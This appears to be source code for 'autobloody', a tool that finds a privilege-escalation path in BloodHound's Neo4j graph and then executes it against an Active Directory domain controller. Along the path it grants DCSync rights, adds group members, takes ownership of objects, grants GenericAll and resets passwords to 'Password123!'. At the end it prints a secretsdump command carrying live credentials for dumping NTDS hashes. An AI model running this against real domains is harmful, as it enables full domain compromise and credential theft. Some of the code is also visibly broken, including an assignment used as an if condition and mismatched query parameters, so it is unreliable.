import bloodyAD
from bloodyAD import utils
from bloodyAD.cli_modules import add, set, remove, get

LOG = utils.LOG


class Automation:
    def __init__(self, args, path):
        self.co_args = args
        self.path = path
        self.rel_types = {
            0: self._nextHop,
            1: self._dcSync,
            2: self._setDCSync,
            3: self._ownerDomain,
            100: self._addMember,
            200: self._aclGroup,
            300: self._ownerGroup,
            100000: self._forceChangePassword,
            100001: self._aclObj,
            100002: self._ownerObj,
            100100: self._forceChangePassword,
            100101: self._aclObj,
            100102: self._ownerObj,
            250: self._genericAll,
            350: self._ownerSpecialObj,
        }
        self.dirty_laundry = []

    def simulate(self):
        self.simulation = True
        self.rel_str = {
            "setDCSync": "[Add DCSync right] to {}",
            "groupMember": "[Membership] on group {} for {}",
            "genericAll": "[GenericAll given] on {} to {}",
            "owner": "[Ownership Given] on {} to {}",
            "password": "[Change password] of {} to {}",
        }
        print(f"\nAuthenticated as {self.co_args.username}:\n")
        self._unfold()

    def exploit(self):
        self.simulation = False
        self.conn = bloodyAD.ConnectionHandler(self.co_args)
        self._unfold()
        self.conn.rebind()

    def _unfold(self):
        for rel in self.path:
            if not self.simulation:
                LOG.info("")
            typeID = rel["cost"]
            try:
                self.rel_types[typeID](rel)
            except Exception as e:
                self._washer()
                # Quick fix for issue #5 remove it when dropping Neo4j dependency
                if typeID = 9999999999:
                    raise ValueError("The path you're trying to exploit is not exploitable by autobloody only, you may need other tools to exploit it. See #Limitations in the README")
                raise e

    def _washer(self):
        if self.simulation:
            print()
        self.dirty_laundry.reverse()
        for laundry in self.dirty_laundry:
            if self.simulation:
                self._printOperation(laundry["f"].__name__, laundry["args"], True)
            else:
                laundry["f"](self.conn, *laundry["args"])
        self.dirty_laundry = []

    def _switchUser(self, user, pwd):
        self._washer()
        if self.simulation:
            print(f"\nAuthenticated as {user}:\n")
        else:
            self.conn.switchUser(user, pwd)

    def _nextHop(self, rel):
        return

    def _dcSync(self, rel):
        if not self.simulation:
            print(
                "[+] You can now dump the NTDS using: secretsdump.py"
                f" '{self.conn.conf.domain}/{self.conn.conf.username}:{self.conn.conf.password}@{self.conn.conf.host}'"
            )

    def _setDCSync(self, rel):
        operation = add.setDCSync
        if self.simulation:
            user = rel["start_node"]["name"]
            self._printOperation(operation.__name__, [user])
        else:
            user = rel["start_node"]["distinguishedname"]
            operation(self.conn, user)

    def _ownerDomain(self, rel):
        self._setOwner(rel)
        self._setDCSync(rel)

    def _addMember(self, rel):
        add_operation = add.groupMember
        if self.simulation:
            member = rel["start_node"]["name"]
            group = rel["end_node"]["name"]
            self._printOperation(add_operation.__name__, [group, member])
        else:
            member = rel["start_node"]["objectid"]
            group = rel["end_node"]["distinguishedname"]
            add_operation(self.conn, group, member)
            self.conn.rebind()
        self.dirty_laundry.append({"f": remove.groupMember, "args": [group, member]})

    def _aclGroup(self, rel):
        self._genericAll(rel)
        self._addMember(rel)

    def _ownerGroup(self, rel):
        self._setOwner(rel)
        self._aclGroup(rel)

    def _aclObj(self, rel):
        self._genericAll(rel)
        self._forceChangePassword(rel)

    def _ownerObj(self, rel):
        self._setOwner(rel)
        self._aclObj(rel)

    def _ownerSpecialObj(self, rel):
        self._setOwner(rel)
        self._genericAll(rel)

    # TODO: change password change with shadow credentials when it's possible
    # TODO: don't perform change password if it's explicitly refused by user
    def _forceChangePassword(self, rel):
        pwd = "Password123!"
        operation = set.password
        if self.simulation:
            user = rel["end_node"]["name"]
            self._printOperation(operation.__name__, [user, pwd])
        else:
            user = rel["end_node"]["distinguishedname"]
            operation(self.conn, user, pwd)
            user = next(get.search(self.conn, user, attr="sAMAccountName"))[
                "sAMAccountName"
            ]
            LOG.debug(f"[+] switching to LDAP connection for user {user}")
        self._switchUser(user, pwd)

    def _genericAll(self, rel):
        add_operation = add.genericAll
        if self.simulation:
            user = rel["start_node"]["name"]
            target = rel["end_node"]["name"]
            self._printOperation(add_operation.__name__, [target, user])
        else:
            user = rel["start_node"]["distinguishedname"]
            target = rel["end_node"]["distinguishedname"]
            add_operation(self.conn, target, user)
        self.dirty_laundry.append({"f": remove.genericAll, "args": [target, user]})

    def _setOwner(self, rel):
        operation = set.owner
        if self.simulation:
            user = rel["start_node"]["name"]
            target = rel["end_node"]["name"]
            self._printOperation(operation.__name__, [target, user])
        else:
            user = rel["start_node"]["distinguishedname"]
            target = rel["end_node"]["distinguishedname"]
            operation(self.conn, target, user)

    def _printOperation(self, operation_name, operation_args, revert=False):
        operation_str = "\t"
        if revert:
            operation_str += "[-] Revert "
        else:
            operation_str += "[+] "

        operation_str += self.rel_str[operation_name]
        arg_nb = operation_str.count("{")
        print(operation_str.format(*operation_args[:arg_nb]))



import unittest, subprocess, pathlib, json, os


class TestModules(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        conf = json.loads((pathlib.Path(__file__).parent / "secrets.json").read_text())
        cls.domain = conf["domain"]
        cls.rootDomainNamingContext = ",".join([
            "DC=" + subdomain for subdomain in cls.domain.split(".")
        ])
        cls.host = conf["pdc"]["ip"]
        cls.admin = {
            "username": conf["admin_user"]["username"],
            "password": conf["admin_user"]["password"],
        }
        cls.pkinit_path = conf["pkinit_path"]
        cls.toTear = []
        cls.env = os.environ.copy()
        cls.autobloody_prefix = [
            "python3",
            "autobloody.py",
            "--host",
            cls.host,
            "-d",
            cls.domain,
        ]
        cls.neo4j = {
            "username": conf["neo4j"]["username"],
            "password": conf["neo4j"]["password"],
            "uri": conf["neo4j"]["uri"],
        }
        # db = Database(cls.neo4j)
        # graph = populateAD()
        # db.createGraph(graph)
        # db.close()

    def test_SimpleRun(self):
        # TODO Add edges/nodes to neo4j database and delete them at the end of the run
        # TODO Add objects to AD and delete them at the end of the run
        # TODO check error if path doesn't exist in DB
        self.launchProcess(
            self.autobloody_prefix
            + [
                "-y",
                "-u",
                "auto.john",
                "-p",
                "Password123!",
                "-dp",
                "Password123!",
                "-ds",
                "AUTO.JOHN@BLOODY.LOCAL",
                "-dt",
                "BLOODY.LOCAL",
            ]
        )

    def populateAD():
        graph = [
            {
                "name": "AddSelf",
                "snode": {
                    "label": "User",
                    "prop": {
                        "name": "auto.selfuser",
                        "distinguishedname": "",
                        "objectId": "",
                    },
                },
                "enode": {
                    "label": "Group",
                    "prop": {
                        "name": "auto.selfgroup",
                        "distinguishedname": "",
                        "objectId": "",
                    },
                },
            }
        ]

        return graph

    def pkinit(self, username, outfile):
        self.assertRegex(
            self.launchProcess(
                [
                    "python3",
                    f"{self.pkinit_path}/gettgtpkinit.py",
                    "-dc-ip",
                    self.host,
                    "-cert-pem",
                    f"{outfile}_cert.pem",
                    "-key-pem",
                    f"{outfile}_priv.pem",
                    f"{self.domain}/{username}",
                    f"{outfile}.ccache",
                ],
                False,
            ),
            "Saved TGT to file",
        )
        for name in [f"{outfile}_cert.pem", f"{outfile}_priv.pem", f"{outfile}.ccache"]:
            self.toTear.append([(pathlib.Path() / name).unlink])

    @classmethod
    def tearDownClass(cls):
        while len(cls.toTear):
            func = cls.toTear.pop()
            if len(func) > 1:
                func[0](*func[1:])
            else:
                func[0]()

    def launchProcess(self, cmd, isErr=True, doPrint=True):
        out, err = subprocess.Popen(
            cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=self.env
        ).communicate()
        out = out.decode()
        if isErr:
            self.assertTrue(out, self.printErr(err.decode(), cmd))
        else:
            out += "\n" + err.decode()
        if doPrint:
            print(out)
        return out

    def printErr(self, err, cmd):
        err = err.replace("\n", "\n ")
        self.err = f"here is the error output ->\n\n {cmd}\n{err}"
        return self.err


from neo4j import GraphDatabase


class Database:
    def __init__(self, neo4j_creds):
        self.driver = GraphDatabase.driver(
            neo4j_creds["uri"], auth=(neo4j_creds["user"], neo4j_creds["password"])
        )
        self._prepareDb()

    def close(self):
        self.driver.close()

    def createGraph(self, graph):
        with self.driver.session() as session:
            session.write_transaction(self._createGraph, graph)

    def destroyGraph(self, graph):
        with self.driver.session() as session:
            session.write_transaction(self._destroyGraph, graph)

    @staticmethod
    def _createGraph(tx, graph):
        for rel in graph:
            tx.run(
                "CREATE (n:$slabel $sprop)",
                slabel=rel["snode"]["label"],
                elabel=rel["enode"]["label"],
            )

    @staticmethod
    def _destroyGraph(tx, graph):
        pass


if __name__ == "__main__":
    unittest.main(failfast=True)



from neo4j import GraphDatabase
import logging


class Database:
    def __init__(self, uri, user, password):
        logging.getLogger("neo4j").setLevel(logging.WARNING)
        self.driver = GraphDatabase.driver(uri, auth=(user, password))
        self._prepareDb()

    def getPrivescPath(self, source, target):
        with self.driver.session() as session:
            relationships = session.read_transaction(
                self._findShortestPath, source, target
            )
        return relationships

    def close(self):
        self.driver.close()

    def _prepareDb(self):
        with self.driver.session() as session:
            session.write_transaction(self._setWeight)
            session.write_transaction(self._createGraph)

    @staticmethod
    def _setWeight(tx):
        # Existing edges on https://github.com/BloodHoundAD/BloodHound/blob/master/docs/data-analysis/edges.rst
        bloodycosts = [
            {"cost": 0, "edges": "MemberOf", "endnode": "Group"},
            {
                "cost": 100,
                "edges": "AddSelf|AddMember|GenericAll|GenericWrite|AllExtendedRights|Contains",
                "endnode": "Group",
            },
            {"cost": 200, "edges": "WriteDacl|Owns", "endnode": "Group"},
            {"cost": 300, "edges": "WriteOwner", "endnode": "Group"},
            {
                "cost": 1,
                "edges": "DCSync|GenericAll|GetChangesAll|AllExtendedRights",
                "endnode": "Domain",
            },
            {"cost": 2, "edges": "WriteDacl|Owns", "endnode": "Domain"},
            {"cost": 3, "edges": "WriteOwner", "endnode": "Domain"},
            {
                "cost": 100000,
                "edges": "GenericWrite|GenericAll|ForceChangePassword|AllExtendedRights|Contains",
                "endnode": "User",
            },
            {"cost": 100001, "edges": "WriteDacl|Owns", "endnode": "User"},
            {"cost": 100002, "edges": "WriteOwner", "endnode": "User"},
            {
                "cost": 100100,
                "edges": "GenericWrite|GenericAll|ForceChangePassword|AllExtendedRights|Contains",
                "endnode": "Computer",
            },
            {"cost": 100101, "edges": "WriteDacl|Owns", "endnode": "Computer"},
            {"cost": 100102, "edges": "WriteOwner", "endnode": "Computer"},
            # If we already have GenericAll right on OU we must ensure inheritance so we'll add a new GenericAll ACE with inheritance
            {"cost": 0, "edges": "Contains|GenericWrite|GenericAll", "endnode": "OU"},
            {"cost": 250, "edges": "WriteDacl|Owns", "endnode": "OU"},
            {"cost": 350, "edges": "WriteOwner", "endnode": "OU"},
            {"cost": 0, "edges": "GenericWrite|GenericAll|Contains", "endnode": "GPO"},
            {"cost": 250, "edges": "WriteDacl|Owns", "endnode": "GPO"},
            {"cost": 350, "edges": "WriteOwner", "endnode": "GPO"},
        ]
        for bloodycost in bloodycosts:
            tx.run(
                f"MATCH ()-[r:{bloodycost['edges']}]->(:{bloodycost['endnode']}) SET"
                f" r.bloodycost = {bloodycost['cost']}"
            )

    @staticmethod
    def _createGraph(tx):
        graph_exists = tx.run("RETURN gds.graph.exists('autobloody')").single()[0]
        if graph_exists:
            tx.run("CALL gds.graph.drop('autobloody')")
        tx.run(
            "CALL gds.graph.project('autobloody','*',{all:{type:'*',"
            " properties:{bloodycost:{defaultValue:9999999999}}}},{validateRelationships:true})"
        )

    # Alternative with only CYPHER https://liberation-data.com/saxeburg-series/2018/11/28/rock-n-roll-traffic-routing.html
    # CONS: Less efficient, more complex PROS: Doesn't need GDS plugin
    @staticmethod
    def _findShortestPath(tx, source, target):
        result = (
            tx.run(
                "MATCH (s {name:$source}), (t {name:$target}) CALL"
                " gds.shortestPath.dijkstra.stream('autobloody',{sourceNode:s,"
                " targetNode:t, relationshipWeightProperty:'bloodycost'})YIELD path"
                " RETURN path",
                source=source,
                target=target,
            )
        ).single()
        if not result:
            raise ValueError("No path exploitable by autobloody found")
        return result[0].relationships



#!/usr/bin/env python3
import argparse, sys
from autobloody import automation, database, proxy_bypass


def main():
    parser = argparse.ArgumentParser(
        description="AD Privesc Automation",
        formatter_class=argparse.RawTextHelpFormatter,
    )

    # DB parameters
    parser.add_argument(
        "--dburi",
        default="bolt://localhost:7687",
        help='The host neo4j is running on (default is "bolt://localhost:7687")',
    )
    parser.add_argument(
        "-du",
        "--dbuser",
        default="neo4j",
        help='Neo4j username to use (default is "neo4j")',
    )
    parser.add_argument(
        "-dp", "--dbpassword", help="Neo4j password to use", required=True
    )
    parser.add_argument(
        "-ds",
        "--dbsource",
        help="Case sensitive label of the source node (name property in bloodhound)",
        required=True,
    )
    parser.add_argument(
        "-dt",
        "--dbtarget",
        help="Case sensitive label of the target node (name property in bloodhound)",
        required=True,
    )

    # Exploitation parameters
    parser.add_argument("-d", "--domain", help="Domain used for NTLM authentication")
    parser.add_argument(
        "-u", "--username", help="Username used for NTLM authentication"
    )
    parser.add_argument(
        "-p",
        "--password",
        help="Cleartext password or LMHASH:NTHASH for NTLM authentication",
    )
    parser.add_argument("-k", "--kerberos", action="store_true", default=False)
    parser.add_argument(
        "-c",
        "--certificate",
        help='Certificate authentication, e.g: "path/to/key:path/to/cert"',
    )
    parser.add_argument(
        "-s",
        "--secure",
        help="Try to use LDAP over TLS aka LDAPS (default is LDAP)",
        action="store_true",
        default=False,
    )
    parser.add_argument(
        "--host",
        help="Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)",
        required=True,
    )
    parser.add_argument(
        "-y",
        "--yes",
        help="Assume yes to apply the generated privesc",
        action="store_true",
        default=False,
    )

    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    args = parser.parse_args()

    path_dict = pathgen(args)

    automate = automation.Automation(args, path_dict)

    if args.yes:
        execute_path = "y"
    else:
        automate.simulate()
        execute_path = input("\n\nApply this privesc?(y/n)")

    if execute_path == "y":
        automate.exploit()
        print("\n[+] Done, attack path executed")
    else:
        print("\n[-] Attack path not executed")


def pathgen(args):
    bypass = proxy_bypass.ProxyBypass()
    db = database.Database(args.dburi, args.dbuser, args.dbpassword)

    path = db.getPrivescPath(args.dbsource, args.dbtarget)
    path_dict = []
    for rel in path:
        start_node = {
            "name": rel.start_node["name"],
            "distinguishedname": rel.start_node["distinguishedname"],
            "objectid": rel.start_node["objectid"],
        }
        end_node = {
            "name": rel.end_node["name"],
            "distinguishedname": rel.end_node["distinguishedname"],
            "objectid": rel.end_node["objectid"],
        }
        path_dict.append({
            "start_node": start_node, "end_node": end_node, "cost": rel["cost"]
        })

    db.close()
    bypass.disable()

    print(
        f"[+] Done, {len(path_dict)} edges have been found between {args.dbsource} and"
        f" {args.dbtarget}"
    )
    return path_dict


if __name__ == "__main__":
    main()
